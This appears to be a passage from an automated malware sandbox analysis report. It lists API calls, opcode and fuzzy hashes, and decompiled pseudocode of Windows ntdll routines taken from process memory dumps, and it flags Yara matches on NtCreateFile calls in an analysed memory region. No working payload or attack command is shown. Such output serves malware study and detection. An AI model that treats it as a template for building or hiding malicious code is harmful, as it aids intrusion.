                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 86d1ae167f1264ff4e123195bd4254e48aca8fff0e1bf20852924967b30914b6
                          • Instruction ID: 903a9b79b9a0f92fefab34c2f3f7bbb7644cceb48348301ec9a965895d9a22af
                          • Opcode Fuzzy Hash: 86d1ae167f1264ff4e123195bd4254e48aca8fff0e1bf20852924967b30914b6
                          • Instruction Fuzzy Hash: 94D02B14A8031BF35F203F701C0D7DF2A61AE44750BD48151FCC457505C734C4450E46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00562D17,00562DB4), ref: 00562D9F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 72377ccdd72571d04adc792edf7030eface8fb63f8d8763f2bcf66cff2b2072c
                          • Instruction ID: be21ac10a46487251ea4766ae79e9ebefdae682190105c2b5de3e35a789d3362
                          • Opcode Fuzzy Hash: 72377ccdd72571d04adc792edf7030eface8fb63f8d8763f2bcf66cff2b2072c
                          • Instruction Fuzzy Hash: 4DD0C974398304BAF9244920AD6BFD661175B92F84E90810DBF4D292C143E75951C516
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c4c162fe59043cf267a21465f19c467eb06bba916632ee1d27e92e324277e739
                          • Instruction ID: 54b09fc11be2cd638be21ef0793a16dafd5f72384b90bf42819669220951ce0e
                          • Opcode Fuzzy Hash: c4c162fe59043cf267a21465f19c467eb06bba916632ee1d27e92e324277e739
                          • Instruction Fuzzy Hash: C7B09BB19014C5C5D601D7614708B1B790177D0741FB6C155D1171641E4778D4D1F5B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          C-Code - Quality: 44%
                          			E1E178E00(void* __ecx) {
                          				signed int _v8;
                          				char _v12;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr* _t32;
                          				intOrPtr _t35;
                          				intOrPtr _t43;
                          				void* _t46;
                          				intOrPtr _t47;
                          				void* _t48;
                          				signed int _t49;
                          				void* _t50;
                          				intOrPtr* _t51;
                          				signed int _t52;
                          				void* _t53;
                          				intOrPtr _t55;
                          
                          				_v8 =  *0x1e23d360 ^ _t52;
                          				_t49 = 0;
                          				_t48 = __ecx;
                          				_t55 =  *0x1e238464; // 0x73b80110
                          				if(_t55 == 0) {
                          					L9:
                          					if( !_t49 >= 0) {
                          						if(( *0x1e235780 & 0x00000003) != 0) {
                          							E1E1C5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                          						}
                          						if(( *0x1e235780 & 0x00000010) != 0) {
                          							asm("int3");
                          						}
                          					}
                          					return E1E18B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                          				}
                          				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                          				_t43 =  *0x1e237984; // 0x8f2b20
                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                          					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                          					if(_t48 == _t43) {
                          						_t50 = 0x5c;
                          						if( *_t32 == _t50) {
                          							_t46 = 0x3f;
                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                          								_t32 = _t32 + 8;
                          							}
                          						}
                          					}
                          					_t51 =  *0x1e238464; // 0x73b80110
                          					 *0x1e23b1e0(_t47, _t32,  &_v12);
                          					_t49 =  *_t51();
                          					if(_t49 >= 0) {
                          						L8:
                          						_t35 = _v12;
                          						if(_t35 != 0) {
                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                          								E1E179B10( *((intOrPtr*)(_t48 + 0x48)));
                          								_t35 = _v12;
                          							}
                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                          						}
                          						goto L9;
                          					}
                          					if(_t49 != 0xc000008a) {
                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                          							if(_t49 != 0xc00000bb) {
                          								goto L8;
                          							}
                          						}
                          					}
                          					if(( *0x1e235780 & 0x00000005) != 0) {
                          						_push(_t49);
                          						E1E1C5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                          						_t53 = _t53 + 0x1c;
                          					}
                          					_t49 = 0;
                          					goto L8;
                          				} else {
                          					goto L9;
                          				}
                          			}





















                          APIs
                          Strings
                          • minkernel\ntdll\ldrsnap.c, xrefs: 1E1B933B, 1E1B9367
                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E1B932A
                          • Querying the active activation context failed with status 0x%08lx, xrefs: 1E1B9357
                          • LdrpFindDllActivationContext, xrefs: 1E1B9331, 1E1B935D
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                          • API String ID: 3446177414-3779518884
                          • Opcode ID: 1cbf35496cfe57077847b958b72b1db845e4ac2050da268fcf4732358e84dc8c
                          • Instruction ID: 9f5b75e9bc79c88aca5368acc674f4ce53c5c9f1575c9eb43033bacf3c2b4a68
                          • Opcode Fuzzy Hash: 1cbf35496cfe57077847b958b72b1db845e4ac2050da268fcf4732358e84dc8c
                          • Instruction Fuzzy Hash: 20411832E103769FD711AA18CD98A66F6B7BB04BC4F264769EC0897191EF706DC08791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 50%
                          			E1E21E824(signed int __ecx, signed int* __edx) {
                          				signed int _v8;
                          				signed char _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				unsigned int _v44;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed int _t177;
                          				signed int _t179;
                          				unsigned int _t202;
                          				signed char _t207;
                          				signed char _t210;
                          				signed int _t230;
                          				void* _t244;
                          				unsigned int _t247;
                          				signed int _t288;
                          				signed int _t289;
                          				signed int _t291;
                          				signed char _t293;
                          				signed char _t295;
                          				signed char _t298;
                          				intOrPtr* _t303;
                          				signed int _t310;
                          				signed char _t316;
                          				signed int _t319;
                          				signed char _t323;
                          				signed char _t330;
                          				signed int _t334;
                          				signed int _t337;
                          				signed int _t341;
                          				signed char _t345;
                          				signed char _t347;
                          				signed int _t353;
                          				signed char _t354;
                          				void* _t383;
                          				signed char _t385;
                          				signed char _t386;
                          				unsigned int _t392;
                          				signed int _t393;
                          				signed int _t395;
                          				signed int _t398;
                          				signed int _t399;
                          				signed int _t401;
                          				unsigned int _t403;
                          				void* _t404;
                          				unsigned int _t405;
                          				signed int _t406;
                          				signed char _t412;
                          				unsigned int _t413;
                          				unsigned int _t418;
                          				void* _t419;
                          				void* _t420;
                          				void* _t421;
                          				void* _t422;
                          				void* _t423;
                          				signed char* _t425;
                          				signed int _t426;
                          				signed int _t428;
                          				unsigned int _t430;
                          				signed int _t431;
                          				signed int _t433;
                          
                          				_v8 =  *0x1e23d360 ^ _t433;
                          				_v40 = __ecx;
                          				_v16 = __edx;
                          				_t289 = 0x4cb2f;
                          				_t425 = __edx[1];
                          				_t403 =  *__edx << 2;
                          				if(_t403 < 8) {
                          					L3:
                          					_t404 = _t403 - 1;
                          					if(_t404 == 0) {
                          						L16:
                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                          						L17:
                          						_t426 = _v40;
                          						_v20 = _t426 + 0x1c;
                          						_t177 = L1E16FAD0(_t426 + 0x1c);
                          						_t385 = 0;
                          						while(1) {
                          							L18:
                          							_t405 =  *(_t426 + 4);
                          							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
                          							_t316 = _t289 & _t179;
                          							_v24 = _t179;
                          							_v32 = _t316;
                          							_v12 = _t316 >> 0x18;
                          							_v36 = _t316 >> 0x10;
                          							_v28 = _t316 >> 8;
                          							if(_t385 != 0) {
                          								goto L21;
                          							}
                          							_t418 = _t405 >> 5;
                          							if(_t418 == 0) {
                          								_t406 = 0;
                          								L31:
                          								if(_t406 == 0) {
                          									L35:
                          									E1E16FA00(_t289, _t316, _t406, _t426 + 0x1c);
                          									 *0x1e23b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
                          									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
                          									_v36 = _t319;
                          									if(_t319 != 0) {
                          										asm("stosd");
                          										asm("stosd");
                          										asm("stosd");
                          										_t408 = _v16;
                          										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
                          										 *((char*)(_t319 + 0xb)) =  *_v16;
                          										 *(_t319 + 4) = _t289;
                          										_t53 = _t319 + 0xc; // 0xc
                          										E1E162280(E1E18F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
                          										_t428 = _v40;
                          										_t386 = 0;
                          										while(1) {
                          											L38:
                          											_t202 =  *(_t428 + 4);
                          											_v16 = _v16 | 0xffffffff;
                          											_v16 = _v16 << (_t202 & 0x0000001f);
                          											_t323 = _v16 & _t289;
                          											_v20 = _t323;
                          											_v20 = _v20 >> 0x18;
                          											_v28 = _t323;
                          											_v28 = _v28 >> 0x10;
                          											_v12 = _t323;
                          											_v12 = _v12 >> 8;
                          											_v32 = _t323;
                          											if(_t386 != 0) {
                          												goto L41;
                          											}
                          											_t247 = _t202 >> 5;
                          											_v24 = _t247;
                          											if(_t247 == 0) {
                          												_t412 = 0;
                          												L50:
                          												if(_t412 == 0) {
                          													L53:
                          													_t291 =  *(_t428 + 4);
                          													_v28 =  *((intOrPtr*)(_t428 + 0x28));
                          													_v44 =  *(_t428 + 0x24);
                          													_v32 =  *((intOrPtr*)(_t428 + 0x20));
                          													_t207 = _t291 >> 5;
                          													if( *_t428 < _t207 + _t207) {
                          														L74:
                          														_t430 = _t291 >> 5;
                          														_t293 = _v36;
                          														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
                          														_v44 = _t210;
                          														_t159 = _t430 - 1; // 0xffffffdf
                          														_t428 = _v40;
                          														_t330 =  *(_t428 + 8);
                          														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                          														_t412 = _t293;
                          														 *_t293 =  *(_t330 + _t386 * 4);
                          														 *(_t330 + _t386 * 4) = _t293;
                          														 *_t428 =  *_t428 + 1;
                          														_t289 = 0;
                          														L75:
                          														E1E15FFB0(_t289, _t412, _t428 + 0x1c);
                          														if(_t289 != 0) {
                          															_t428 =  *(_t428 + 0x24);
                          															 *0x1e23b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
                          															 *_t428();
                          														}
                          														L77:
                          														return E1E18B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
                          													}
                          													_t334 = 2;
                          													_t207 = E1E17F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
                          													if(_t207 < 0) {
                          														goto L74;
                          													}
                          													_t413 = _v24;
                          													if(_t413 < 4) {
                          														_t413 = 4;
                          													}
                          													 *0x1e23b1e0(_t413 << 2, _v28);
                          													_t207 =  *_v32();
                          													_t386 = _t207;
                          													_v16 = _t386;
                          													if(_t386 == 0) {
                          														_t291 =  *(_t428 + 4);
                          														if(_t291 >= 0x20) {
                          															goto L74;
                          														}
                          														_t289 = _v36;
                          														_t412 = 0;
                          														goto L75;
                          													} else {
                          														_t108 = _t413 - 1; // 0x3
                          														_t337 = _t108;
                          														if((_t413 & _t337) == 0) {
                          															L62:
                          															if(_t413 > 0x4000000) {
                          																_t413 = 0x4000000;
                          															}
                          															_t295 = _t386;
                          															_v24 = _v24 & 0x00000000;
                          															_t392 = _t413 << 2;
                          															_t230 = _t428 | 0x00000001;
                          															_t393 = _t392 >> 2;
                          															asm("sbb ecx, ecx");
                          															_t341 =  !(_v16 + _t392) & _t393;
                          															if(_t341 <= 0) {
                          																L67:
                          																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
                          																_v32 = _t395;
                          																_v20 = 0;
                          																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
                          																	L72:
                          																	_t345 =  *(_t428 + 8);
                          																	_t207 = _v16;
                          																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
                          																	 *(_t428 + 8) = _t207;
                          																	 *(_t428 + 4) = _t291;
                          																	if(_t345 != 0) {
                          																		 *0x1e23b1e0(_t345, _v28);
                          																		_t207 =  *_v44();
                          																		_t291 =  *(_t428 + 4);
                          																	}
                          																	goto L74;
                          																} else {
                          																	goto L68;
                          																}
                          																do {
                          																	L68:
                          																	_t298 =  *(_t428 + 8);
                          																	_t431 = _v20;
                          																	_v12 = _t298;
                          																	while(1) {
                          																		_t347 =  *(_t298 + _t431 * 4);
                          																		_v24 = _t347;
                          																		if((_t347 & 0x00000001) != 0) {
                          																			goto L71;
                          																		}
                          																		 *(_t298 + _t431 * 4) =  *_t347;
                          																		_t300 =  *(_t347 + 4) & _t395;
                          																		_t398 = _v16;
                          																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                          																		_t303 = _v24;
                          																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
                          																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
                          																		_t395 = _v32;
                          																		_t298 = _v12;
                          																	}
                          																	L71:
                          																	_v20 = _t431 + 1;
                          																	_t428 = _v40;
                          																} while (_v20 <  *(_t428 + 4) >> 5);
                          																goto L72;
                          															} else {
                          																_t399 = _v24;
                          																do {
                          																	_t399 = _t399 + 1;
                          																	 *_t295 = _t230;
                          																	_t295 = _t295 + 4;
                          																} while (_t399 < _t341);
                          																goto L67;
                          															}
                          														}
                          														_t354 = _t337 | 0xffffffff;
                          														if(_t413 == 0) {
                          															L61:
                          															_t413 = 1 << _t354;
                          															goto L62;
                          														} else {
                          															goto L60;
                          														}
                          														do {
                          															L60:
                          															_t354 = _t354 + 1;
                          															_t413 = _t413 >> 1;
                          														} while (_t413 != 0);
                          														goto L61;
                          													}
                          												}
                          												_t89 = _t412 + 8; // 0x8
                          												_t244 = E1E21E7A8(_t89);
                          												_t289 = _v36;
                          												if(_t244 == 0) {
                          													_t412 = 0;
                          												}
                          												goto L75;
                          											}
                          											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
                          											_t323 = _v32;
                          											while(1) {
                          												L41:
                          												_t386 =  *_t386;
                          												_v12 = _t386;
                          												if((_t386 & 0x00000001) != 0) {
                          													break;
                          												}
                          												if(_t323 == ( *(_t386 + 4) & _v16)) {
                          													L45:
                          													if(_t386 == 0) {
                          														goto L53;
                          													}
                          													if(E1E21E7EB(_t386, _t408) != 0) {
                          														_t412 = _v12;
                          														goto L50;
                          													}
                          													_t386 = _v12;
                          													goto L38;
                          												}
                          											}
                          											_t386 = 0;
                          											_v12 = 0;
                          											goto L45;
                          										}
                          									}
                          									_t412 = 0;
                          									goto L77;
                          								}
                          								_t38 = _t406 + 8; // 0x8
                          								_t364 = _t38;
                          								if(E1E21E7A8(_t38) == 0) {
                          									_t406 = 0;
                          								}
                          								E1E16FA00(_t289, _t364, _t406, _v20);
                          								goto L77;
                          							}
                          							_t24 = _t418 - 1; // -1
                          							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
                          							_t316 = _v32;
                          							L21:
                          							_t406 = _v24;
                          							while(1) {
                          								_t385 =  *_t385;
                          								_v12 = _t385;
                          								if((_t385 & 0x00000001) != 0) {
                          									break;
                          								}
                          								if(_t316 == ( *(_t385 + 4) & _t406)) {
                          									L26:
                          									if(_t385 == 0) {
                          										goto L35;
                          									}
                          									_t177 = E1E21E7EB(_t385, _v16);
                          									if(_t177 != 0) {
                          										_t406 = _v12;
                          										goto L31;
                          									}
                          									_t385 = _v12;
                          									goto L18;
                          								}
                          							}
                          							_t385 = 0;
                          							_v12 = 0;
                          							goto L26;
                          						}
                          					}
                          					_t419 = _t404 - 1;
                          					if(_t419 == 0) {
                          						L15:
                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                          						_t425 =  &(_t425[1]);
                          						goto L16;
                          					}
                          					_t420 = _t419 - 1;
                          					if(_t420 == 0) {
                          						L14:
                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                          						_t425 =  &(_t425[1]);
                          						goto L15;
                          					}
                          					_t421 = _t420 - 1;
                          					if(_t421 == 0) {
                          						L13:
                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                          						_t425 =  &(_t425[1]);
                          						goto L14;
                          					}
                          					_t422 = _t421 - 1;
                          					if(_t422 == 0) {
                          						L12:
                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                          						_t425 =  &(_t425[1]);
                          						goto L13;
                          					}
                          					_t423 = _t422 - 1;
                          					if(_t423 == 0) {
                          						L11:
                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                          						_t425 =  &(_t425[1]);
                          						goto L12;
                          					}
                          					if(_t423 != 1) {
                          						goto L17;
                          					} else {
                          						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                          						_t425 =  &(_t425[1]);
                          						goto L11;
                          					}
                          				} else {
                          					_t401 = _t403 >> 3;
                          					_t403 = _t403 + _t401 * 0xfffffff8;
                          					do {
                          						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
                          						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
                          						_t288 = _t425[7] & 0x000000ff;
                          						_t425 =  &(_t425[8]);
                          						_t289 = _t310 + _t383 + _t288;
                          						_t401 = _t401 - 1;
                          					} while (_t401 != 0);
                          					goto L3;
                          				}
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 2b8103f1e45fedd5424b32e9a7b563de51682323e24b333ab34eb8dd4471f5db
                          • Instruction ID: d4e926d0d85c9ee175136190505cbfcd4734fc9d4bb85cc6170c18b27197e3cf
                          • Opcode Fuzzy Hash: 2b8103f1e45fedd5424b32e9a7b563de51682323e24b333ab34eb8dd4471f5db
                          • Instruction Fuzzy Hash: DF02A472E006168BCB18CFA9CCE167EBBF6BF88200765466DE456DB381D734EA41CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 26%
                          			E1E17645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                          				signed int _v8;
                          				void* _v36;
                          				intOrPtr _v48;
                          				intOrPtr _v52;
                          				intOrPtr _v56;
                          				char _v60;
                          				char _v64;
                          				intOrPtr _v68;
                          				intOrPtr _v72;
                          				intOrPtr _v76;
                          				intOrPtr _v80;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t48;
                          				intOrPtr _t49;
                          				intOrPtr _t50;
                          				intOrPtr* _t52;
                          				char _t56;
                          				void* _t69;
                          				char _t72;
                          				void* _t73;
                          				intOrPtr _t75;
                          				intOrPtr _t79;
                          				void* _t82;
                          				void* _t84;
                          				intOrPtr _t86;
                          				void* _t88;
                          				signed int _t90;
                          				signed int _t92;
                          				signed int _t93;
                          
                          				_t80 = __edx;
                          				_t92 = (_t90 & 0xfffffff8) - 0x4c;
                          				_v8 =  *0x1e23d360 ^ _t92;
                          				_t72 = 0;
                          				_v72 = __edx;
                          				_t82 = __ecx;
                          				_t86 =  *((intOrPtr*)(__edx + 0xc8));
                          				_v68 = _t86;
                          				E1E18FA60( &_v60, 0, 0x30);
                          				_t48 =  *((intOrPtr*)(_t82 + 0x70));
                          				_t93 = _t92 + 0xc;
                          				_v76 = _t48;
                          				_t49 = _t48;
                          				if(_t49 == 0) {
                          					_push(5);
                          					 *((char*)(_t82 + 0x6a)) = 0;
                          					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
                          					goto L3;
                          				} else {
                          					_t69 = _t49 - 1;
                          					if(_t69 != 0) {
                          						if(_t69 == 1) {
                          							_push(0xa);
                          							goto L3;
                          						} else {
                          							_t56 = 0;
                          						}
                          					} else {
                          						_push(4);
                          						L3:
                          						_pop(_t50);
                          						_v80 = _t50;
                          						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
                          							E1E162280(_t50, _t86 + 0x1c);
                          							_t79 = _v72;
                          							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                          							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
                          							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
                          							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
                          							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
                          							E1E15FFB0(_t72, _t82, _t86 + 0x1c);
                          						}
                          						_t75 = _v80;
                          						_t52 =  *((intOrPtr*)(_v72 + 0x20));
                          						_t80 =  *_t52;
                          						_v72 =  *((intOrPtr*)(_t52 + 4));
                          						_v52 =  *((intOrPtr*)(_t82 + 0x68));
                          						_v60 = 0x30;
                          						_v56 = _t75;
                          						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
                          						asm("movsd");
                          						_v76 = _t80;
                          						_v64 = 0x30;
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						if(_t80 != 0) {
                          							 *0x1e23b1e0(_t75, _v72,  &_v64,  &_v60);
                          							_t72 = _v76();
                          						}
                          						_t56 = _t72;
                          					}
                          				}
                          				_pop(_t84);
                          				_pop(_t88);
                          				_pop(_t73);
                          				return E1E18B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
                          			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: 0$0
                          • API String ID: 3446177414-203156872
                          • Opcode ID: c260afe713c2270187f3d2ce974bc9e83b1d795b7664609e1039bb70c606080d
                          • Instruction ID: b47bd499decef92a957bb0505a6b6976f13bc40ee20e98af7d2c8143d727f44b
                          • Opcode Fuzzy Hash: c260afe713c2270187f3d2ce974bc9e83b1d795b7664609e1039bb70c606080d
                          • Instruction Fuzzy Hash: 04416DB1A087469FC300CF28C584A56BBE5BB8D714F144A2EF489DB301D771EA85CF96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 53%
                          			E1E1DFDDA(intOrPtr* __edx, intOrPtr _a4) {
                          				void* _t7;
                          				intOrPtr _t9;
                          				intOrPtr _t10;
                          				intOrPtr* _t12;
                          				intOrPtr* _t13;
                          				intOrPtr _t14;
                          				intOrPtr* _t15;
                          
                          				_t13 = __edx;
                          				_push(_a4);
                          				_t14 =  *[fs:0x18];
                          				_t15 = _t12;
                          				_t7 = E1E18CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                          				_push(_t13);
                          				E1E1D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                          				_t9 =  *_t15;
                          				if(_t9 == 0xffffffff) {
                          					_t10 = 0;
                          				} else {
                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                          				}
                          				_push(_t10);
                          				_push(_t15);
                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                          				return E1E1D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                          			}

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E1DFDFA
                          Strings
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E1DFE01
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E1DFE2B
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                          • API String ID: 885266447-3903918235
                          • Opcode ID: aeb6b97bf4973ea757f7249c517894b544dd6edf168eb9844b0821b00a929c22
                          • Instruction ID: 947a8d01e2cff3d7590ba6488eb3c1d1bc525920ab676a64f1434b983f8a3aed
                          • Opcode Fuzzy Hash: aeb6b97bf4973ea757f7249c517894b544dd6edf168eb9844b0821b00a929c22
                          • Instruction Fuzzy Hash: C1F0F036600241BFEA205A45DC45FA3BF6EFB44B71F254314F628562E1EA62F9A0C6F0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Executed Functions

                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,01114B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01114B77,007A002E,00000000,00000060,00000000,00000000), ref: 01119D9D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                          • Instruction ID: 9dc3549bfe3a8268fc6e2b43ffc682382b14ceb76651bd8f7d415a04a2736b4f
                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                          • Instruction Fuzzy Hash: 49F0BDB2201208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97240D630E8518BA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,01114B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01114B77,007A002E,00000000,00000060,00000000,00000000), ref: 01119D9D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
